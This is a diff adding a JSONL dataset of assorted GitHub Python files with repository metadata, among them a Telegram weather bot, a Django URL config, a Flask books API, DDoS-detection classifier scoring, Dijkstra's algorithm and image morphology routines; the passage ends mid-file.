diff --git "a/4925.jsonl" "b/4925.jsonl" new file mode 100644--- /dev/null +++ "b/4925.jsonl" @@ -0,0 +1,881 @@ +{"seq_id":"12494920234","text":"import telebot\r\nimport requests\r\nimport json\r\n\r\n\r\nToken = open(\"token.txt\", \"r\").read()\r\nApi_key = open(\"apikey.txt\", \"r\").read()\r\n\r\nbot = telebot.TeleBot(Token)\r\n\r\n\r\ndef weather(text):\r\n resp = requests.get('http://api.openweathermap.org/data/2.5/weather?q='+text+'&appid='+Api_key)\r\n if resp.status_code == 200:\r\n data = json.loads(resp.content.decode('UTF-8'))\r\n name = 'Weather in the city ' + data['name'] + ' \\n \\n '\r\n temp = 'Temperature:' + str(int(round(data['main']['temp'] - 273))) + '° C \\n '\r\n state = 'State: ' + data['weather'][0]['description'] + ' \\n '\r\n wind = 'Wind: '+str(data['wind']['speed'])+' m/s\\n'\r\n return name+temp+state+wind\r\n else:\r\n return 'Can not find city ' + text\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start_message(message):\r\n bot . send_message ( message.chat.id,'Hello, write me the name of the city in English and I will find the weather '\r\n 'forecast.')\r\n\r\n\r\n@ bot . message_handler(func=lambda n: True)\r\ndef fun(message):\r\n bot.send_message(message.chat.id, weather(message.text))\r\n\r\ntry:\r\n bot.polling(none_stop=True, timeout=50)\r\nexcept:\r\n pass","repo_name":"im-yash/WeatherBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41229688542","text":"import os\nimport sys\nimport copy\n\ncurrent_file = os.path.basename(__file__)[:-3]\nsys.stdin = open(f\"input/{current_file}_input.txt\", \"r\")\nresult = []\n\nT = int(input())\n\n\ndef rotate(y, x, target, arr):\n global N\n\n if N - y - x == 1:\n return target\n\n for _ in range(N - y - x - 1):\n # right\n for i in range(x, N - x):\n if i == x:\n target[y][i] = arr[y + 1][i]\n else:\n target[y][i] = arr[y][i - 1]\n\n # down\n for i in range(y + 1, N - y):\n target[i][N - x - 1] = arr[i - 1][N - x - 1]\n\n # left\n for i in range(N - x - 1, x, -1):\n target[N - y - 1][i - 1] = arr[N - y - 1][i]\n\n # up\n for i in range(N - y - 1, y, -1):\n target[i - 1][x] = arr[i][x]\n\n arr = copy.deepcopy(target)\n\n return target\n\n\nfor case in range(1, T + 1):\n N = int(input())\n\n arr = list(list(map(int, input().split())) for _ in range(N))\n\n result.append(f\"#{case}\")\n\n rotate_result = []\n rotate_1 = []\n rotate_2 = []\n rotate_3 = []\n\n for i in range(N // 2):\n rotate_1 = rotate(i, i, arr, copy.deepcopy(arr))\n\n rotate_2 = copy.deepcopy(rotate_1)\n for i in range(N // 2):\n rotate_2 = rotate(i, i, rotate_2, copy.deepcopy(rotate_1))\n\n rotate_3 = copy.deepcopy(rotate_2)\n for i in range(N // 2):\n rotate_3 = rotate(i, i, rotate_3, copy.deepcopy(rotate_2))\n\n for i, j, k in zip(rotate_1, rotate_2, rotate_3):\n st = \"\".join(map(str, i))\n st += \" \"\n st += \"\".join(map(str, j))\n st += \" \"\n st += \"\".join(map(str, k))\n\n result.append(st)\n\nfor _ in result:\n print(_)\n\noutput = open(f\"output/{current_file}_output.txt\", \"r\").readlines()\noutput = [line.strip() for line in output]\nprint(result == output)\n","repo_name":"qkre/SWEA","sub_path":"PJH/1961.py","file_name":"1961.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8079443885","text":"#Dump and load convert between files and objects, while dumps and loads convert between strings and objects.\n#options de dump intéréssantes ==> indent=None, separators=None, \n\n\n#serialisation:\n#Exemple:\ndata = {\n \"president\": {\n \"name\": \"Zaphod Beeblebrox\",\n \"species\": \"Betelgeusian\"\n }\n}\n\n#Il est important d'arriver à sauvegarder des données\n\nimport json\n#méthode 1, retourne un fichier où le json est stocker\nwith open(\"data_file.json\", \"w\") as write_file:\n json.dump(data, write_file) \n#méthode 2, retourne une chaine de caractères dans laqeulle le json est stocké\njson_string = json.dumps(data) \n\n#deserialisation:\nimport json\n#methode 1 si le json est stocké dans un fichier\nwith open(\"data_file.json\", \"r\") as read_file:\n data = json.load(read_file)\n#methode 2 pour convertir une chaine de cara en json\ndata = json.loads(json_string)\n","repo_name":"lacornichon/twitterPredictor","sub_path":"WorkingDocs/serialisation_deserialisation_COURS.py","file_name":"serialisation_deserialisation_COURS.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30268220925","text":"from django.urls import path, reverse_lazy\nfrom django.contrib.auth import views as auth_views\nfrom . import views\n\napp_name = 'core'\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('register/', views.register, name='register'),\n path('login/', auth_views.LoginView.as_view(), name='login'),\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n path('account/', views.dashboard, name='dashboard'),\n path('recipes', views.RecipeView.as_view(), name='recipes'),\n path('categories/', views.GroupView.as_view(), name='categories'),\n path('recipe_set/', views.SearchResultView.as_view(), name='recipe_set'),\n path('posts/', views.PostsView.as_view(), name='posts'),\n path('add/', views.AddView.as_view(), name='add'),\n path('/', views.SingleView.as_view(), name='single'),\n path('edit//', views.EditView.as_view(), name='edit'),\n path('delete//', views.Delete.as_view(), name='delete'),\n]","repo_name":"johnniekf/vegfreshlive","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1245563574","text":"import json\nimport random\nimport ast\n#from person import Player\n\nclass Team:\n def __init__(self, name, team_type,team_rating,num_players,num_int_players, jersey_colors, jersey_decorations, club):\n self.name = name\n self.team_type = team_type\n self.rating = team_rating\n self.players = {}\n self.num_players = num_players\n self.num_int_players = num_int_players\n self.jersey_colors = ast.literal_eval(jersey_colors)\n self.jersey_decorations = ast.literal_eval(jersey_decorations)\n self.club = club\n self.actual_positions = {\n \"goalkeeper\": {\"player_uuid\": None, \"tactic\": 0},\n \"libero\": {\"player_uuid\": None, \"tactic\": 0},\n \"leftdef\": {\"player_uuid\": None, \"tactic\": 0},\n \"rightdef\": {\"player_uuid\": None, \"tactic\": 0},\n \"lefthalf\": {\"player_uuid\": None, \"tactic\": 0},\n \"righthalf\": {\"player_uuid\": None, \"tactic\": 0},\n \"leftmid\": {\"player_uuid\": None, \"tactic\": 0},\n \"centralmid\": {\"player_uuid\": None, \"tactic\": 0},\n \"rightmid\": {\"player_uuid\": None, \"tactic\": 0},\n \"leftattack\": {\"player_uuid\": None, \"tactic\": 0},\n \"rightattack\": {\"player_uuid\": None, \"tactic\": 0},\n 'sub1': {'player_uuid': None, 'tactic': 0},\n 'sub2': {'player_uuid': None, 'tactic': 0},\n 'sub3': {'player_uuid': None, 'tactic': 0},\n 'sub4': {'player_uuid': None, 'tactic': 0},\n 'sub5': {'player_uuid': None, 'tactic': 0}\n }\n\n def return_name(self):\n return self.name\n\n def return_jersey_colors(self):\n return self.jersey_colors\n\n def return_jersey_decorations(self):\n return self.jersey_decorations\n\n def return_team_type(self):\n return self.team_type\n\n def to_dict(self):\n player_list = []\n for player_uuid in self.players.keys():\n player_dict = {\n 'uuid': str(player_uuid),\n 'jersey_number': self.players[player_uuid].jersey_number\n }\n player_list.append(player_dict)\n position_list = []\n for actual_position in self.actual_positions.keys():\n position_dict = {\n 'actual_position': actual_position,\n 'player_uuid': str(self.actual_positions[actual_position]['player_uuid']),\n 'tactic': self.actual_positions[actual_position]['tactic']\n }\n position_list.append(position_dict)\n\n #print(self.players)\n return {\n 'name': self.name,\n 'team_type': self.team_type,\n 'team_rating': self.rating,\n 'num_players': 0,\n 'num_int_players': 0,\n 'players': player_list,\n 'actual_positions': position_list,\n 'jersey_colors': str(self.jersey_colors),\n 'jersey_decorations': str(self.jersey_decorations)\n }\n\n def print_players(self):\n print(f\"Players in team {self.name}:\")\n for player_uuid in self.players:\n #print(f\"- {self.player[player.uuid].jersey_number} {player.first_name} {player.last_name} ({player.position})\")\n print(f\"- {self.players[player_uuid].jersey_number}\")\n\n def get_players(self):\n player_list = []\n for player in self.players.values():\n player_list.append((player.uuid, self.players[player.uuid].jersey_number, player.first_name, player.last_name, player.age, player.position))\n return player_list\n\n def add_player(self, player):\n player.add_team(self)\n self.players[player.uuid] = player\n self.players[player.uuid].jersey_number = 0\n #self.players.append(player)\n\n def return_num_players(self):\n return self.num_players,self.num_int_players\n\n def return_position(self):\n postion=self.player.return_position()\n return postion\n\n def change_player_jersey_number(self, player_uuid, new_jersey_number):\n # Check if jersey number is between 1 and 99\n #print (new_jersey_number)\n if new_jersey_number < 1 or new_jersey_number > 99:\n print(\"Jersey number must be between 1 and 99.\")\n return False\n\n # Check if no other player has the same jersey number\n #print(self.players)\n for player_uuid in self.players.keys():\n #print(self.players[player_uuid].jersey_number)\n if self.players[player_uuid].jersey_number == new_jersey_number and str(self.player.uuid) != str(player_uuid):\n print(f\"Player {self.player.first_name} {self.player.last_name} already has jersey number {new_jersey_number}.\")\n return False\n\n # Add or change the jersey number in the players dictionary\n if player_uuid in self.players:\n self.players[player_uuid].jersey_number = new_jersey_number\n return True\n else:\n print(f\"Player with UUID {player_uuid} not found in team {self.name}.\")\n return False\n\n def assign_player_to_position(self,position,position_uuid):\n # Create a list of player UUIDs\n player_uuids = list(self.players.keys())\n\n assign_uuid = None\n\n for player_uuid in player_uuids:\n if str(player_uuid) == str(position_uuid):\n assign_uuid = player_uuid\n\n if assign_uuid is not None:\n self.actual_positions[position][\"player_uuid\"] = assign_uuid\n\n def assign_players_to_positions(self):\n # Create a list of player UUIDs\n player_uuids = list(self.players.keys())\n\n # Shuffle the list of player UUIDs\n random.shuffle(player_uuids)\n\n # Assign each position to a player UUID\n self.actual_positions[\"goalkeeper\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"libero\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"leftdef\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"rightdef\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"lefthalf\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"righthalf\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"leftmid\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"centralmid\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"rightmid\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"leftattack\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"rightattack\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub1\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub2\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub3\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub4\"][\"player_uuid\"] = player_uuids.pop(0)\n self.actual_positions[\"sub5\"][\"player_uuid\"] = player_uuids.pop(0)\n\n","repo_name":"thelinkan/BandyManagerChatGPT","sub_path":"team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":6986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35886393652","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# vim: ts=4:sw=4:sts=4:ai:et:fileencoding=utf-8:number\n\nimport select, time, sys, datetime\nfrom Config import Config\nimport traceback\n\n\nTRACE = True\n\n\nclass Log:\n\n def get_timestamp(self):\n return str(datetime.datetime.now())\n\n\n def pdebug(self,*args):\n if TRACE:\n try:\n if (args[0].__len__()) > Config.MAX_LEN_MSG:\n sys.stdout.write('%s, %s\\n' % (self.get_timestamp(), args[0][0:Config.MAX_LEN_MSG-3]+'..'))\n else:\n sys.stdout.write('%s, %s\\n' % (self.get_timestamp(), args[0]))\n except Exception as e:\n print(traceback.format_exc())\n print(args)\n print('!!! Log exception %s, %r' % (e, len(args)))\n return\n","repo_name":"jiquintana/tfc","sub_path":"__src__/working/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8637799246","text":"n, m = list(map(int, input().split()))\narr = []\nfor _ in range(n):\n arr.append(list(map(int, list(input()))))\n\nans = 1\nfor i in range(n):\n for j in range(m):\n M = min(n-i-1, m-j-1) # 가능한 최대 길이\n while M > 0:\n if 0 <= i+M < n and 0 <= j+M < m:\n if arr[i][j] == arr[i+M][j] and arr[i][j] == arr[i][j+M]\\\n and arr[i][j] == arr[i+M][j+M]:\n ans = max(ans, (M+1)*(M+1))\n # print(i, j, M, ans)\n break\n M -= 1\n\nprint(ans)\n","repo_name":"yangwooseong/algorithm","sub_path":"boj/1051.py","file_name":"1051.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18200708760","text":"import numpy as np\nimport pandas as pd\nimport math\n\ndef log2(x):\n if x == 0:\n return 0\n return math.log(x,2)\n\ndef main():\n file = \"training_set2.csv\"\n tree = decisionTree()\n testdata =pd.read_csv(\"test_set2.csv\")\n valid = pd.read_csv(\"validation_set2.csv\")\n df = tree.load_csv(file)\n heuristic = 'gain'\n print(\"building Tree\")\n root = tree.buildTree(df,df.columns[:-1], heuristic)\n# depth = 0\n print(tree.parse_tree(root,0))\n print(tree.accuracy(df,root))\n print(tree.accuracy(testdata,root))\n print(tree.accuracy(valid,root))\n \n root2 = tree.buildTree(df,df.columns[:-1],'variance')\n print(tree.parse_tree(root2,0))\n# print(depth)\n print(tree.accuracy(df,root2))\n print(tree.accuracy(testdata,root2))\n print(tree.accuracy(valid,root2))\nclass Node:\n def __init__(self):\n self.attr = None\n self.value = None\n self.left = None\n self.right = None\n self.parent = None\n \nclass decisionTree:\n def __init__(self):\n self.dataset = None\n \n def load_csv(self,filename):\n df = pd.read_csv(filename)\n self.dataset = df\n return df\n def getCount(self, arr):\n count = np.unique(arr, return_counts = True)[1]\n return count\n \n def entropy(self,column):\n counts = self.getCount(column)\n entropy = 0.0\n if len(counts)==0:\n return 0.0\n total = sum(counts)\n for i in range(len(counts)):\n entropy += -float(counts[i])/total*np.log2(float(counts[i])/total)\n return entropy\n \n \n def InfoGain_entropy(self,data,attr_name):\n total_entropy = self.entropy(data[\"Class\"])\n counts= self.getCount(data[attr_name])\n \n attr_Entropy = 0.0\n for i in range(len(counts)):\n probability = float(counts[i])/sum(counts)\n split = data.where(data[attr_name]==i).dropna()\n split_entropy = self.entropy(split[\"Class\"])\n attr_Entropy += probability * split_entropy\n \n return total_entropy - attr_Entropy\n \n def variance(self, column):\n counts = self.getCount(column)\n total = sum(counts)\n if len(counts)<=1:\n return 0\n variance = 1\n for i in range(len(counts)):\n variance*= float(counts[i])/total\n return variance\n \n def InfoGain_variance(self,data,attr_name):\n total_variance = self.variance(data[\"Class\"])\n counts= self.getCount(data[attr_name])\n attr_impurity = 0\n for i in range(len(counts)):\n probability = float(counts[i])/sum(counts)\n split = data.where(data[attr_name]==i).dropna()\n split_variance = self.variance(split[\"Class\"])\n attr_impurity += probability * split_variance\n \n gain = total_variance - attr_impurity\n return gain\n\n def max_freq(self,data, target):\n counts = self.getCount(data[target])\n freq = np.argmax(counts)\n return int(np.unique(data[target])[freq])\n\n def buildTree(self, data, attributes, heuristic):\n node = Node()\n unique = np.unique(data[\"Class\"])\n if len(unique) == 1:\n node.value = int(unique[0])\n \n elif len(data)==0:\n node.value = self.max_freq(self.dataset, \"Class\")\n \n elif len(attributes) ==0:\n node.value = node.parent\n else:\n node.parent = self.max_freq(data, \"Class\")\n \n max_gain = np.NINF\n best_attr = ''\n if heuristic=='gain':\n for attr in attributes:\n if attr!=\"Class\":\n gain = self.InfoGain_entropy(data,attr)\n if max_gain[-\\w]+)/(?P[-\\w]+)/$', view=views.maquina, name='urlMaquina'),\n url(r'^formMaquina', views.formularioMaquina, name='urlFormMaquina'),\n url(r'^FormEstrutura', views.formularioEstrutura, name='urlFormEstrutura'),\n url(r'^ajax/carregarEstruturas/', views.carregarEstruturas, name='ajaxCarregarEstruturas'),\n url(r'^ajax/carregarPrazosEstrutura/', views.carregarPrazosEstrutura, name='ajaxCarregarPrazosEstrutura'),\n url('accounts/login/', auth_views.LoginView.as_view(), name='loginForm'),\n url('accounts/logout/', auth_views.LogoutView.as_view(), name='logout'),\n url(r'^HourlyScheduleManagement1', views.hourlySchedManag1, name='urlHourlySchedManag1'),\n url(r'^HourlyScheduleManagement2/(?P[-\\w]+)/(?P[-\\w]+)/(?P[-\\w]+)/$', views.hourlySchedManag2, name='urlHourlySchedManag2'),\n url(r'^formHourlyScheduleManagement', views.formularioHourlySchedManag, name='urlFormHourlySchedManag'),\n url(r'^hsm', views.formularioHourlySchedManagAdd, name='urlFormHourlySchedManagAdd'),\n\n url(r'^ajax/carEstrProcHSM/', views.carregarEstrProcHSM, name='ajaxCarEstrProcHSM'),\n\n url(r'^bc', views.baixarCartao, name='urlBaixarCartao'),\n url(r'^cb/(?P[-\\w]+)/(?P[-\\w]+)/$', views.baixarCartaoSalvar, name='urlBaixarCartaoSalvar'),\n]\n","repo_name":"phsd/SGV-Prot-tipo","sub_path":"telaPrincipal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"44717768562","text":"from flask import Flask\nfrom flask_restful import reqparse, abort, Api, Resource\nfrom flask_ngrok import run_with_ngrok\nfrom flasgger import Swagger\n\napp = Flask(__name__)\napi = Api(app)\nswagger = Swagger(app)\nrun_with_ngrok(app)\n\n\nBOOKS = {\n 'book0': {'title': 'placeholder', 'author': 'placeholder'}\n}\n\n\ndef abort_if_todo_doesnt_exist(book_id):\n if book_id not in BOOKS:\n abort(404, message=\"Book {} doesn't exist\".format(book_id))\n\nparser = reqparse.RequestParser()\nparser.add_argument('title')\nparser.add_argument('author')\n\n\n\nclass Book(Resource):\n def get(self, book_id):\n \"\"\"\n Get a specific book\n ---\n tags:\n - restful\n parameters:\n - in: path\n name: book_id\n required: true\n description: The specified book.\n type: string\n examples: book0\n responses:\n 200:\n description: Book List\n schema:\n id: Book\n properties:\n title:\n type: string\n default:\n author:\n type: string\n default:\n \"\"\"\n abort_if_todo_doesnt_exist(book_id)\n return BOOKS[book_id]\n\n def delete(self, book_id):\n \"\"\"\n Delete a book\n ---\n tags:\n - restful\n parameters:\n - in: path\n name: book_id\n required: true\n description: The ID of the book\n type: string\n responses:\n 204:\n description: Book deleted\n \"\"\"\n abort_if_todo_doesnt_exist(book_id)\n del BOOKS[book_id]\n return '', 204\n\n def put(self, book_id):\n \"\"\"\n Update a book's information\n ---\n tags:\n - restful\n parameters:\n - in: body\n name: body\n schema:\n $ref: '#/definitions/Book'\n - in: path\n name: book_id\n required: true\n description: The ID of the book\n type: string\n responses:\n 201:\n description: The information has been updated\n schema:\n $ref: '#/definitions/Book'\n \"\"\"\n args = parser.parse_args()\n book = {'title': args['title'], 'author': args['author']}\n BOOKS[book_id] = book\n return book, 201\n\n\nclass BooksList(Resource):\n def get(self):\n return BOOKS\n\n def post(self):\n \"\"\"\n Enter book data\n ---\n tags:\n - restful\n parameters:\n - in: body\n name: body\n schema:\n $ref: '#/definitions/Book'\n responses:\n 201:\n description: The book information has been updated\n schema:\n $ref: '#/definitions/Book'\n \"\"\"\n args = parser.parse_args()\n book_id = int(max(BOOKS.keys()).lstrip('book')) + 1\n book_id = 'book%i' % book_id\n BOOKS[book_id] = {'title': args['title'], 'author': args['author']}\n return BOOKS[book_id], 201\n\n\napi.add_resource(BooksList, '/books')\napi.add_resource(Book, '/books/')\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"BangBarMau/FinalAPI","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38118302659","text":"from sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\nimport pandas as pd\nimport warnings\nfrom multiprocessing import Process, Pool\nfrom Preprocess import Preprocess\nfrom numba import cuda\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n# Malicious data from 'SYN\\\\Syn_2_split\\\\Syn_2_3.csv'\n'''\nbenign = Preprocess(\"D:/BENIGN.csv\")\nmalicious = Preprocess(\"D:/MALICIOUS.csv\")\nbenign_features_time = pd.read_csv(\"D:/Benign_features_time.csv\")\nmalicious_features_time = pd.read_csv(\"D:/Malicious_features_time.csv\")\n'''\n\nbenign_features_conn = pd.read_csv(\"D:/Benign_features_conn.csv\")\nmalicious_features_conn = pd.read_csv(\"D:/Malicious_features_conn.csv\")\n\n# Test, conn based\n\nx = pd.concat([malicious_features_conn, benign_features_conn]).values\n# Remove id\nx = [i[1:] for i in x]\ny = [0] * len(malicious_features_conn) + [1] * len(benign_features_conn)\n# X_train, X_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=2019)\n\n# MLP\n\nmlp = MLPClassifier()\n\n# Random Forest\n\nrf = RandomForestClassifier(bootstrap=True, oob_score=True, criterion='gini')\n\n# Naive Bayes\n\nbernoulli_nb = BernoulliNB()\nmultinomial_nb = MultinomialNB()\n\n# Support vector machine\n\nsvm = SVC()\n\n# K-nearest neighbors\nknn = KNeighborsClassifier(n_neighbors=3)\n\ndef score(classifier, x=x, y=y, verbose=False, num_cv = 10):\n if verbose:\n print(\"Estimating\",type(classifier))\n accuracy = cross_val_score(classifier, x, y, cv=num_cv)\n precision = cross_val_score(classifier, x, y, cv=num_cv, scoring='precision')\n recall = cross_val_score(classifier, x, y, cv=num_cv, scoring='recall')\n if verbose:\n print(\"Classifier type:\", type(classifier), \"\\nAccuracy:\", accuracy, \"\\nPrecision:\", precision, \"\\nRecall:\", recall)\n return accuracy, precision, recall\n\n\n\n\nif __name__ == '__main__':\n pool = Pool(6)\n pool.apply_async(score, [mlp, x, y,True])\n pool.apply_async(score, [rf, x, y,True])\n pool.apply_async(score, [bernoulli_nb, x, y,True])\n pool.apply_async(score, [multinomial_nb, x, y,True])\n pool.apply_async(score, [svm, x, y,True])\n pool.apply_async(score, [knn, x, y,True])\n pool.close()\n pool.join()\n","repo_name":"uozkl/Machine-Learning-DDoS","sub_path":"src/score/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"30815539083","text":"import heapq as priority\nimport math\n\nvisited = {}\nparent_node = {}\n\ndef dijkstra(start,edges):\n\n def relax(a, b, wt):\n if b in visited:\n return\n if myDict[b] > myDict[a]+wt:\n myDict[b] = myDict[a]+wt\n parent_node[b] = a\n for i in range(len(h)):\n if h[i][1] == b:\n h[i][0] = myDict[a]+wt\n\n h=[]\n myDict = {}\n for i in edges:\n myDict[i] = math.inf\n myDict[start] = 0\n parent_node[start] = None\n [priority.heappush(h, [j,i]) for i, j in myDict.items()]\n visited[start]= True\n a = priority.heappop(h)\n while(a):\n value, vertice = a\n for b,wt in edges[vertice].items():\n relax(vertice, b, wt)\n\n try:\n a = priority.heappop(h)\n visited[a[1]] = True\n except:\n break\n\n return myDict\n\n\ndef parent(a):\n if a is not None:\n parent(parent_node[a])\n print(a)\n\n\ndef path(a):\n for i,j in a.items():\n print(\"path of \"+str(i))\n print(\"path length \"+str(j))\n parent(i)\n print('\\n')\n\n\n\n\n\nstart = 'S'\nedges = {'S':{'A':3,'C':2,'F':6},'A':{'D':1,'B':6},\n 'B':{'E':1},'C':{'A':2,'D':3},\n 'D':{'E':4},'E':{},'F':{'E':2}}\n\nresult = dijkstra(start=start,edges=edges)\npath(result)\n","repo_name":"raunakvijan/Algorithms","sub_path":"graphs/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41893701520","text":"from django.urls import path\nfrom elebox.views import index, corpusview, element, placeview, device\n\n\nurlpatterns = [\n path('', index, name='index'),\n path('model3d//', corpusview, name='3dmodels'),\n path('model3d/', corpusview, name='3dmodels'),\n path('element/', element, name='radioelem'),\n path('element//', element, name='radioelem'),\n path('place/', placeview, name='places'),\n path('place//', placeview, name='places'),\n path('device/', device, name= 'devices'),\n path('device//', device, name= 'devices'),\n # path(r'^component/$', 'component'),\n]\n","repo_name":"Valber/rlmbase","sub_path":"elebox/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"34103719761","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import collections as mc\n\nfigures_i = 0\nfigures_N = 40\n\n\ndef key_press_event(event):\n global figures_i\n fig = event.canvas.figure\n\n if event.key == 'q' or event.key == 'escape':\n plt.close(event.canvas.figure)\n return\n\n if event.key == 'right':\n figures_i = (figures_i + 1) % figures_N\n elif event.key == 'left':\n figures_i = (figures_i - 1) % figures_N\n\n fig.clear()\n my_plot(fig, figures_i)\n plt.draw()\n\n\ndef my_plot(fig, figures_i):\n ax = fig.add_subplot(111)\n\n iteration = str(figures_i).zfill(3)\n\n X = np.loadtxt(f\"output/RocketLanding2D/iteration{iteration}_X.txt\")\n U = np.loadtxt(f\"output/RocketLanding2D/iteration{iteration}_U.txt\")\n\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n\n lines = []\n line_colors = []\n\n K = X.shape[1]\n\n for k in range(K):\n rx = X[0, k]\n ry = X[1, k]\n vx = X[2, k]\n vy = X[3, k]\n theta = X[4, k]\n throttle = U[0, k]\n gimbal = U[1, k]\n\n # speed vector\n speed_scale = 0.\n lines.append(\n [(rx, ry), (rx + speed_scale * vx, ry + speed_scale * vy)])\n line_colors.append((0, 1, 0, 1))\n\n # attitude vector\n heading_scale = 0.05\n c_theta = heading_scale * np.cos(theta)\n s_theta = heading_scale * np.sin(theta)\n lines.append([(rx, ry), (rx + s_theta, ry + c_theta)])\n line_colors.append((0, 0, 1, 1))\n\n # thrust vector\n throttle_scale = 0.1\n Tx = throttle_scale * throttle * np.sin(theta + gimbal)\n Ty = throttle_scale * throttle * np.cos(theta + gimbal)\n lines.append([(rx, ry), (rx - Tx, ry - Ty)])\n line_colors.append((1, 0, 0, 1))\n\n lc = mc.LineCollection(lines, colors=line_colors, linewidths=1.5)\n\n ax.add_collection(lc)\n ax.axis('equal')\n ax.set_title(\"iter \" + str(figures_i))\n\n\ndef main():\n global figures_i, figures_N\n figures_N = sum(f.endswith(\"X.txt\")\n for f in os.listdir(\"output/RocketLanding2D/\"))\n fig = plt.figure(figsize=(10, 10))\n figures_i = figures_N - 1\n my_plot(fig, figures_i)\n cid = fig.canvas.mpl_connect('key_press_event', key_press_event)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"geotyper/SCpp","sub_path":"evaluation/RocketLanding2D/plot_RocketLanding2D.py","file_name":"plot_RocketLanding2D.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"29892153607","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n'''\nUAQ Thermo Breast Cancer\n\nmorphology.py\n\nauthor: Marco Garduno\nemail: mgarduno01@alumnos.uaq.mx\nlast modified: 14 March 2018\n'''\n\nimport cv2\nimport numpy as np\nimport functions as f\n\ndef dilation(map, size):\n height, width = map.shape\n auxMap = np.copy(map)\n\n for k in range(0, size):\n # B1\n for j in range(0, height):\n for i in range(0, width-1):\n if auxMap[j, i] < auxMap[j, i+1]:\n auxMap[j, i] = auxMap[j, i+1]\n\n # B2\n for j in range(0, height-1):\n for i in range(0, width):\n if auxMap[j, i] < auxMap[j+1, i]:\n auxMap[j, i] = auxMap[j+1, i]\n\n # B3\n for j in range(0, height):\n for i in range(width-1, 0, -1):\n if auxMap[j, i] < auxMap[j, i-1]:\n auxMap[j, i] = auxMap[j, i-1]\n\n # B4\n for j in range(height-1, 0, -1):\n for i in range(0, width):\n if auxMap[j, i] < auxMap[j-1, i]:\n auxMap[j, i] = auxMap[j-1, i]\n\n return auxMap\n\ndef erosion(map, size):\n height, width = map.shape\n auxMap = np.copy(map)\n\n auxMap = f.negative_gray(auxMap)\n auxMap = dilation(auxMap,size)\n auxMap = f.negative_gray(auxMap)\n\n return auxMap\n\ndef opening(map, size):\n auxMap = np.copy(map)\n\n auxMap = erosion(auxMap, size)\n auxMap = dilation(auxMap, size)\n\n return auxMap\n\ndef closing(map, size):\n auxMap = np.copy(map)\n\n auxMap = dilation(auxMap, size)\n auxMap = erosion(auxMap, size)\n\n return auxMap\n\ndef geodesic_dilation(I, J):\n height, width = I.shape\n flag = True\n\n while(flag):\n\n img_auxiliar = np.copy(J)\n\n for j in range(1, height):\n for i in range(1, width-1):\n list1 = ( 